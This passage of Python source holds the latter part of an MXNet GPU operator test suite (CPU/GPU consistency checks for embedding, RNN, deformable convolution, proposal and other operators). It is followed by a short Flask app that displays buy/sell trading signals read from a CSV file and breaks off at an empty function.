                    {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
        check_consistency(sym, ctx_list)


@with_seed()
def test_lrn():
    """Check CPU/GPU consistency of local response normalization (float32 only)."""
    sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
    ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
                {'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
    check_consistency(sym, ctx_list)


@with_seed()
def test_embedding_with_type():
    """Check CPU/GPU consistency of Embedding over data/weight dtype combos,
    including indices padded outside [0, V) to exercise out-of-range handling."""
    def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
        NVD = [[20, 10, 20], [200, 10, 300]]
        for N, V, D in NVD:
            sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
            ctx_list = []
            for data_type in data_types:
                for weight_type in weight_types:
                    ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
                                     'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
                    ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
                                     'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
            arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
            check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null', 'embedding_weight': 'write'},
                              arg_params=arg_params)

    data_types = [np.float16, np.float32, np.float64, np.int32]
    weight_types = [np.float16, np.float32, np.float64]
    test_embedding_helper(data_types, weight_types, 5, 5)
    # uint8 indices cannot go negative, so no low padding for this sweep.
    data_types = [np.uint8]
    weight_types = [np.float16, np.float32, np.float64]
    test_embedding_helper(data_types, weight_types, 0, 5)


@with_seed()
def test_svmoutput_with_type():
    """Check CPU/GPU consistency of SVMOutput across dtypes."""
    sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
    ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
                {'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
                {'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
                {'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
                {'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
                {'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
    check_consistency(sym, ctx_list, use_uniform=True)


@with_seed()
def test_take_with_type():
    """Check CPU/GPU consistency of take() over random data/index ranks and dtypes."""
    sym = mx.sym.take(name='take')
    for data_ndim in range(2, 5):
        for idx_ndim in range(1, 4):
            data_shape = ()
            for _ in range(data_ndim):
                data_shape += (np.random.randint(low=3, high=6), )
            idx_shape = ()
            for _ in range(idx_ndim):
                idx_shape += (np.random.randint(low=3, high=5), )
            ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape,
                         'type_dict': {'take_indices': np.float64, 'take_a': np.float64}},
                        {'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape,
                         'type_dict': {'take_indices': np.float32, 'take_a': np.float32}},
                        {'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape,
                         'type_dict': {'take_indices': np.float16, 'take_a': np.float16}},
                        {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape,
                         'type_dict': {'take_indices': np.float64, 'take_a': np.float64}},
                        {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape,
                         'type_dict': {'take_indices': np.float32, 'take_a': np.float32}},
                        {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape,
                         'type_dict': {'take_indices': np.float16, 'take_a': np.float16}}]
            arg_params = {'take_indices': np.random.randint(low=0, high=data_shape[0], size=idx_shape),
                          'take_a': np.random.normal(size=data_shape)}
            check_consistency(sym, ctx_list,
                              grad_req={'take_indices': 'null', 'take_a': 'write'},
                              arg_params=arg_params)


def check_rnn_consistency(cell1, cell2):
    """Unroll two RNN cells on the same data/weights and assert matching outputs.

    Weights are initialized on cell1's module, then translated via
    unpack_weights/pack_weights so both cells compute from identical parameters.
    """
    dshape = (32, 5, 200)
    data = mx.sym.Variable('data')

    sym1, _ = cell1.unroll(5, data, merge_outputs=True)
    mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
    mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)

    sym2, _ = cell2.unroll(5, data, merge_outputs=True)
    mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
    mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)

    mod1.init_params()
    args, auxs = mod1.get_params()
    args = cell1.unpack_weights(args)
    args = cell2.pack_weights(args)
    mod2.set_params(args, auxs)

    batch = mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
    mod1.forward(batch, is_train=False)
    mod2.forward(batch, is_train=False)

    assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(),
                    rtol=1e-2, atol=1e-4)


@with_seed()
@assert_raises_cudnn_disabled()
def test_rnn():
    """Fused cuDNN RNN (relu) must agree with a stacked unfused RNN."""
    fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
    stack = mx.rnn.SequentialRNNCell()
    stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
    stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
    check_rnn_consistency(fused, stack)
    check_rnn_consistency(stack, fused)


@with_seed()
@assert_raises_cudnn_disabled()
def test_lstm_forget_bias():
    """Forget-gate bias passed to FusedRNNCell must survive weight unpacking."""
    forget_bias = 2.0
    fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')

    dshape = (32, 1, 20)
    data = mx.sym.Variable('data')

    sym, _ = fused.unroll(1, data, merge_outputs=True)
    mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
    mod.bind(data_shapes=[('data', dshape)], label_shapes=None)

    mod.init_params()
    args, auxs = mod.get_params()
    args = fused.unpack_weights(args)

    bias_name = next(x for x in args if x.endswith('f_bias'))
    expected_bias = forget_bias * np.ones(10, )
    assert_allclose(args[bias_name].asnumpy(), expected_bias)


@with_seed()
@assert_raises_cudnn_disabled()
def test_gru():
    """Fused cuDNN GRU must agree with a stacked unfused GRU."""
    fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
    stack = mx.rnn.SequentialRNNCell()
    stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
    stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
    check_rnn_consistency(fused, stack)
    check_rnn_consistency(stack, fused)


@with_seed()
@assert_raises_cudnn_disabled()
def test_bidirectional():
    """Fused bidirectional GRU must agree with stacked BidirectionalCells."""
    fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
                                bidirectional=True)

    stack = mx.rnn.SequentialRNNCell()
    stack.add(mx.rnn.BidirectionalCell(
        mx.rnn.GRUCell(100, prefix='l0_'),
        mx.rnn.GRUCell(100, prefix='r0_'),
        output_prefix='bi_gru_0_'))
    stack.add(mx.rnn.BidirectionalCell(
        mx.rnn.GRUCell(100, prefix='l1_'),
        mx.rnn.GRUCell(100, prefix='r1_'),
        output_prefix='bi_gru_1_'))

    check_rnn_consistency(fused, stack)
    check_rnn_consistency(stack, fused)


@with_seed()
@assert_raises_cudnn_disabled()
def test_unfuse():
    """For each RNN mode, a fused cell must agree with its own unfuse()d form."""
    for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
        fused = mx.rnn.FusedRNNCell(
            100, num_layers=2, mode=mode,
            prefix='test_%s' % mode,
            bidirectional=True,
            dropout=0.5)

        stack = fused.unfuse()
        check_rnn_consistency(fused, stack)
        check_rnn_consistency(stack, fused)
@with_seed(1234)
def test_psroipooling_with_type():
    """GPU-only dtype consistency check for contrib.PSROIPooling (fp64/fp32/fp16)."""
    arg_params = {
        'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}

    # plain psroipooling
    sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
    ctx_list = [{'ctx': mx.gpu(0),
                 'psroipool_data': (1, 18, 14, 14),
                 'psroipool_rois': (2, 5),
                 'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
                {'ctx': mx.gpu(0),
                 'psroipool_data': (1, 18, 14, 14),
                 'psroipool_rois': (2, 5),
                 'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
                {'ctx': mx.gpu(0),
                 'psroipool_data': (1, 18, 14, 14),
                 'psroipool_rois': (2, 5),
                 'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
                ]
    check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write', 'psroipool_rois': 'null'},
                      arg_params=arg_params)


@with_seed(1234)
def test_deformable_psroipooling_with_type():
    """GPU-only dtype consistency check for contrib.DeformablePSROIPooling."""
    arg_params = {
        'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}

    # deformable psroipooling
    sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3,
                                                pooled_size=3, output_dim=2, trans_std=0.1, no_trans=False,
                                                name='deformable_psroipool')

    ctx_list = [{'ctx': mx.gpu(0),
                 'deformable_psroipool_data': (1, 18, 14, 14),
                 'deformable_psroipool_rois': (2, 5),
                 'deformable_psroipool_trans': (2, 4, 3, 3),
                 'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
                               'deformable_psroipool_trans': np.float64}},
                {'ctx': mx.gpu(0),
                 'deformable_psroipool_data': (1, 18, 14, 14),
                 'deformable_psroipool_rois': (2, 5),
                 'deformable_psroipool_trans': (2, 4, 3, 3),
                 'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
                               'deformable_psroipool_trans': np.float32}},
                {'ctx': mx.gpu(0),
                 'deformable_psroipool_data': (1, 18, 14, 14),
                 'deformable_psroipool_rois': (2, 5),
                 'deformable_psroipool_trans': (2, 4, 3, 3),
                 'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
                               'deformable_psroipool_trans': np.float16}},
                ]
    check_consistency(sym, ctx_list, grad_req={'deformable_psroipool_data': 'write',
                                               'deformable_psroipool_rois': 'null',
                                               'deformable_psroipool_trans': 'write'},
                      arg_params=arg_params)


@with_seed(1234)
def test_deformable_convolution_with_type():
    """GPU-only dtype consistency check for contrib.DeformableConvolution."""
    sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3, 3), name='deformable_conv')
    # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
    ctx_list = [{'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 10, 10),
                 'deformable_conv_offset': (2, 18, 8, 8),
                 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
                {'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 10, 10),
                 'deformable_conv_offset': (2, 18, 8, 8),
                 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
                # {'ctx': mx.gpu(0),
                #  'deformable_conv_data': (2, 2, 10, 10),
                #  'deformable_conv_offset': (2, 18, 8, 8),
                #  'type_dict': {'deformable_conv_data': np.float16, 'deformable_conv_offset': np.float16}},
                ]
    # wider tolerance needed for true-fp16 NCHW test above
    tol = {np.dtype(np.float16): 0.5,
           np.dtype(np.float32): 1e-3,
           np.dtype(np.float64): 1e-5,
           np.dtype(np.uint8): 0,
           np.dtype(np.int32): 0}
    check_consistency(sym, ctx_list, tol=tol)
    # test ability to turn off training on bias
    check_consistency(sym, ctx_list, grad_req={'deformable_conv_data': 'write',
                                               'deformable_conv_offset': 'write',
                                               'deformable_conv_weight': 'write',
                                               'deformable_conv_bias': 'null'}, tol=tol)


@with_seed()
def test_deformable_convolution_options():
    """Exercise pad/stride/dilate/num_deformable_group options of DeformableConvolution."""
    tol = {np.dtype(np.float32): 1e-1,
           np.dtype(np.float64): 1e-3}
    # 2D convolution

    # Pad > 0
    # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
    ctx_list = [{'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 7, 7),
                 'deformable_conv_offset': (2, 18, 7, 7),
                 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
                {'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 7, 7),
                 'deformable_conv_offset': (2, 18, 7, 7),
                 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
                ]
    sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3, 3), pad=(1, 1), name='deformable_conv')
    check_consistency(sym, ctx_list, scale=0.1, tol=tol)

    # Stride > 1
    # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
    ctx_list = [{'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 7, 7),
                 'deformable_conv_offset': (2, 18, 3, 3),
                 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
                {'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 7, 7),
                 'deformable_conv_offset': (2, 18, 3, 3),
                 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
                ]
    sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3, 3), stride=(2, 2), name='deformable_conv')
    check_consistency(sym, ctx_list, scale=0.1, tol=tol)

    # Dilate > 1
    # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
    ctx_list = [{'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 7, 7),
                 'deformable_conv_offset': (2, 18, 3, 3),
                 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
                {'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 7, 7),
                 'deformable_conv_offset': (2, 18, 3, 3),
                 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
                ]
    sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3, 3), dilate=(2, 2), name='deformable_conv')
    check_consistency(sym, ctx_list, scale=0.1, tol=tol)

    # Deformable group > 1
    # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
    ctx_list = [{'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 7, 7),
                 'deformable_conv_offset': (2, 36, 5, 5),
                 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
                {'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 7, 7),
                 'deformable_conv_offset': (2, 36, 5, 5),
                 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
                # {'ctx': mx.gpu(0),
                #  'deformable_conv_data': (2, 2, 7, 7),
                #  'deformable_conv_offset': (2, 36, 5, 5),
                #  'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
                ]
    sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3, 3), num_deformable_group=2,
                                               name='deformable_conv')
    # BUGFIX: this case built the symbol but never ran the check, so the
    # num_deformable_group=2 configuration was silently untested.
    check_consistency(sym, ctx_list, scale=0.1, tol=tol)


@with_seed()
@assert_raises_cudnn_disabled()
def test_residual_fused():
    """ResidualCell around a fused LSTM: zero weights must yield input + 0."""
    cell = mx.rnn.ResidualCell(
        mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
                            prefix='rnn_', dropout=0.5))

    inputs = [mx.sym.Variable('rnn_t%d_data' % i) for i in range(2)]
    outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
    assert sorted(cell.params._params.keys()) == \
        ['rnn_parameters']

    args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
    assert outs == [(10, 2, 50)]
    outputs = outputs.eval(ctx=mx.gpu(0),
                           rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0)) + 5,
                           rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0)) + 5,
                           rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
    expected_outputs = np.ones((10, 2, 50)) + 5
    assert np.array_equal(outputs[0].asnumpy(), expected_outputs)


def check_rnn_layer(layer):
    """Run a gluon RNN layer on identical ones-input on GPU and CPU and compare."""
    layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
    with mx.gpu(0):
        x = mx.nd.ones((10, 16, 30))
        states = layer.begin_state(16)
        go, gs = layer(x, states)

    with mx.cpu(0):
        x = mx.nd.ones((10, 16, 30))
        states = layer.begin_state(16)
        co, cs = layer(x, states)

    # atol of 1e-6 required, as exposed by seed 2124685726
    assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
    for g, c in zip(gs, cs):
        assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)


def check_rnn_layer_w_rand_inputs(layer):
    """Same as check_rnn_layer but with a shared random input tensor."""
    layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
    x = mx.nd.uniform(shape=(10, 16, 30))
    with mx.gpu(0):
        x = x.copyto(mx.gpu(0))
        states = layer.begin_state(16)
        go, gs = layer(x, states)

    with mx.cpu(0):
        x = x.copyto(mx.cpu(0))
        states = layer.begin_state(16)
        co, cs = layer(x, states)

    assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
    for g, c in zip(gs, cs):
        assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)


@with_seed()
def test_sequence_reverse():
    """Delegate the shared sequence-reverse check to the GPU context."""
    check_sequence_reverse(mx.gpu(0))


@with_seed()
def test_autograd_save_memory():
    """A long chain of in-graph adds must not exhaust GPU memory under autograd."""
    x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
    x.attach_grad()

    with mx.autograd.record():
        for i in range(200):
            x = x + 1
            x.wait_to_read()
    x.backward()


@with_seed()
def test_cuda_rtc():
    """Compile and launch CUDA kernels at runtime via mx.rtc (incl. shared mem)."""
    source = r'''
    extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
        int i = threadIdx.x + blockIdx.x * blockDim.x;
        y[i] += alpha * x[i];
    }

    extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
        extern __shared__ float smem[];
        int i = threadIdx.x + blockIdx.x * blockDim.x;
        smem[threadIdx.x] = x[i];
        y[i] += alpha * smem[threadIdx.x];
    }
    '''
    module = mx.rtc.CudaModule(source)
    axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
    x = mx.nd.ones((10,), ctx=mx.gpu(0))
    y = mx.nd.zeros((10,), ctx=mx.gpu(0))
    axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
    assert (y.asnumpy() == 3).all()

    saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
    saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
    assert (y.asnumpy() == 7).all()

    saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
    assert (y.asnumpy() == 12).all()


@with_seed()
def test_cross_device_autograd():
    """Gradients must flow correctly through device-to-device copies."""
    x = mx.nd.random.uniform(shape=(10,))
    x.attach_grad()

    with mx.autograd.record():
        y = mx.nd.tanh(x)
        y = y.copyto(mx.gpu(0))
        y = mx.nd.tanh(y)
        y = y.copyto(mx.cpu(0))
        y = mx.nd.tanh(y)
        y = y.copyto(mx.gpu(0))
        y = y.copyto(mx.gpu(0))

        y.backward()

    dx = x.grad.asnumpy()
    x.grad[:] = 0

    with mx.autograd.record():
        y = x
        for i in range(3):
            y = mx.nd.tanh(y)
        y.backward()

    assert_almost_equal(dx, x.grad.asnumpy())


@with_seed()
def test_multi_proposal_op():
    """CPU/GPU consistency of (Multi)Proposal, with and without NMS."""
    # parameters
    feature_stride = 16
    scales = (8, 16, 32)
    ratios = (0.5, 1, 2)
    rpn_pre_nms_top_n = 12000
    rpn_post_nms_top_n = 2000
    rpn_min_size = feature_stride

    feat_len = (1000 + 15) // 16
    H, W = feat_len, feat_len
    num_anchors = len(scales) * len(ratios)
    count_anchors = H * W * num_anchors

    def get_new_data(batch_size, ctx):
        '''
        cls_prob: (batch_size, 2 * num_anchors, H, W)
        bbox_pred: (batch_size, 4 * num_anchors, H, W)
        im_info: (batch_size, 3)
        '''

        dtype = np.float32
        cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype=dtype, ctx=ctx)
        bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype=dtype, ctx=ctx)
        im_info = mx.nd.empty((batch_size, 3), dtype=dtype, ctx=ctx)

        # distinct, shuffled scores so sorting inside the op is unambiguous
        cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
        np.random.shuffle(cls)
        cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype=dtype, ctx=ctx), shape=cls_prob.shape)
        bbox_pred = mx.nd.array(np.random.randint(-2, 3, size=bbox_pred.shape), dtype=dtype, ctx=ctx)

        for i in range(batch_size):
            im_size = np.random.randint(600, feat_len * feature_stride, size=(2,))
            im_scale = np.random.randint(80, 100) / 100.0
            im_info[i, :] = [im_size[0], im_size[1], im_scale]
        return cls_prob, bbox_pred, im_info

    def check_proposal_consistency(op, batch_size, with_nms=False):
        '''
        op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
        '''
        cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
        rois_cpu, score_cpu = op(
            cls_prob=cls_prob,
            bbox_pred=bbox_pred,
            im_info=im_info,
            feature_stride=feature_stride,
            scales=scales,
            ratios=ratios,
            rpn_pre_nms_top_n=rpn_pre_nms_top_n,
            rpn_post_nms_top_n=rpn_post_nms_top_n,
            threshold=0.7 if with_nms else 1.0,
            rpn_min_size=rpn_min_size, output_score=True)

        gpu_ctx = mx.gpu(0)

        # copy data to gpu from cpu
        cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
        bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
        im_info_gpu = im_info.as_in_context(gpu_ctx)

        rois_gpu, score_gpu = op(
            cls_prob=cls_prob_gpu,
            bbox_pred=bbox_pred_gpu,
            im_info=im_info_gpu,
            feature_stride=feature_stride,
            scales=scales,
            ratios=ratios,
            rpn_pre_nms_top_n=rpn_pre_nms_top_n,
            rpn_post_nms_top_n=rpn_post_nms_top_n,
            threshold=0.7 if with_nms else 1.0,
            rpn_min_size=rpn_min_size, output_score=True)

        rois_cpu_np = rois_cpu.asnumpy()
        rois_gpu_np = rois_gpu.asnumpy()

        score_cpu_np = score_cpu.asnumpy()
        score_gpu_np = score_gpu.asnumpy()

        if not with_nms:
            assert_almost_equal(score_cpu_np, score_gpu_np, atol=1e-3, rtol=1e-3)
            assert_almost_equal(rois_cpu_np, rois_gpu_np, atol=1e-3, rtol=1e-3)
        else:
            # no 100% guarantee with nms
            assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
            assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)

    check_proposal_consistency(mx.nd.contrib.Proposal, 1)
    check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
    check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
    check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)


# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
    """Trigger a synchronous GPU kernel error via imperative divide-by-empty."""
    os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
    a = mx.nd.array([1, 2, 3], ctx=mx.gpu(0))
    b = mx.nd.array([], ctx=mx.gpu(0))
    c = (a / b).asnumpy()


def kernel_error_check_symbolic():
    """Trigger a synchronous GPU kernel error via symbolic divide-by-empty."""
    os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
    a = mx.sym.Variable('a')
    b = mx.sym.Variable('b')
    c = a / b
    f = c.bind(mx.gpu(0), {'a': mx.nd.array([1, 2, 3], ctx=mx.gpu(0)),
                           'b': mx.nd.array([], ctx=mx.gpu(0))})
    f.forward()
    g = f.outputs[0].asnumpy()


def test_kernel_error_checking():
    """Spawn the kernel-error reproducers in subprocesses and expect nonzero exits."""
    # Running tests that may throw exceptions out of worker threads will stop CI testing
    # if not run in a separate process (with its own address space for CUDA compatibility).
    try:
        mpctx = mp.get_context('spawn')
    except:
        print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
              sys.version_info[0:2], file=sys.stderr, end='')
    else:
        with discard_stderr():
            for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
                p = mpctx.Process(target=f)
                p.start()
                p.join()
                assert p.exitcode != 0,\
                    "Expected a synchronous kernel error from %s(), none seen." % f.__name__


def test_incorrect_gpu():
    """Using an absurd GPU device id must raise MXNetError."""
    # Try setting dev_id to a really big number
    assert_raises(MXNetError, mx.nd.ones, (2, 2), ctx=mx.gpu(100001))


@with_seed()
def test_batchnorm_backwards_notrain():
    """BatchNorm backward with train_mode=False must run on CPU/GPU, cuDNN on/off."""
    for ctx in [mx.cpu(0), mx.gpu(0)]:
        for cudnn_o in [False, True]:
            B, C, H, W = 4, 3, 2, 2
            x = mx.nd.random.poisson(1, shape=(B, C, H, W)).as_in_context(ctx)
            gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
            beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
            mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
            std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
            x.attach_grad()

            with autograd.record(False):
                y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
                                         fix_gamma=False, cudnn_off=cudnn_o)
                loss = y.square().sum()
            loss.backward(train_mode=False)


@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
    """A row_sparse array built on CPU from GPU components must round-trip intact."""
    dim0 = 10
    dim1 = 5
    densities = [0, 0.5, 1]
    for density in densities:
        shape = rand_shape_2d(dim0, dim1)
        matrix = rand_ndarray(shape, 'row_sparse', density)
        data = matrix.data
        indices = matrix.indices
        rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
        assert rsp_created.stype == 'row_sparse'
        assert same(rsp_created.data.asnumpy(), data.asnumpy())
        assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
        rsp_copy = mx.nd.array(rsp_created)
        assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))


@with_seed()
def test_softmax_activation():
    """SoftmaxActivation forward and backward must agree between CPU and GPU."""
    gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
                         [2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
    cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
                         [2., -.4, 7., 3., 0.2]], ctx=mx.cpu())

    cpu_a.attach_grad()
    gpu_a.attach_grad()
    with mx.autograd.record():
        gpu_y = mx.nd.SoftmaxActivation(data=gpu_a)
        cpu_y = mx.nd.SoftmaxActivation(data=cpu_a)
        assert_almost_equal(cpu_y.asnumpy(), gpu_y.asnumpy(), atol=1e-3, rtol=1e-3)

        gpu_y.backward()
        cpu_y.backward()
        assert_almost_equal(cpu_a.grad.asnumpy(), gpu_a.grad.asnumpy(), atol=1e-3, rtol=1e-3)


def test_context_num_gpus():
    """num_gpus must report at least one device on a GPU CI host."""
    # Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
    assert mx.context.num_gpus() > 0


if __name__ == '__main__':
    import nose
    nose.runmodule()
# --- file: myproject.py ---
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 17:26:15 2020

@author: mehmet

Small Flask front-end that renders the latest model signals from result.csv
as buy/sell labels, newest rows first.
"""
import time

import pandas as pd
from flask import Flask, render_template

app = Flask(__name__)

# Columns in result.csv holding raw numeric signals to be shown as labels.
SIGNAL_COLUMNS = ["lstm_class", "lstm_predic", "lstm_price",
                  "signal1", "signal2", "signal3"]


def buysell(signal):
    """Map a numeric signal to its display label.

    Positive values mean "buy"; zero or negative mean "sell".

    BUGFIX: the original returned None for negative signals (only ``> 0`` and
    ``== 0`` were handled), which rendered as the literal string "None" in the
    template; negative values now map to "sell".
    """
    return "buy" if signal > 0 else "sell"


@app.route('/', methods=['POST', 'GET'])
def index():
    """Render the signal table from result.csv, newest rows first."""
    df = pd.read_csv("result.csv")
    df = df.sort_index(ascending=False)
    for col in SIGNAL_COLUMNS:
        df[col] = df[col].apply(buysell)
    # Rows are passed to the template as plain lists in display-column order.
    e_list = [[r["lstm_class"], r["lstm_predic"], r["lstm_price"],
               r["predict_time"], r["future_time"], r["time_price"],
               r["future_price"], r["signal1"], r["signal2"], r["signal3"]]
              for _, r in df.iterrows()]
    return render_template('index.html', my_list=e_list, lis=len(e_list))


def sleep():
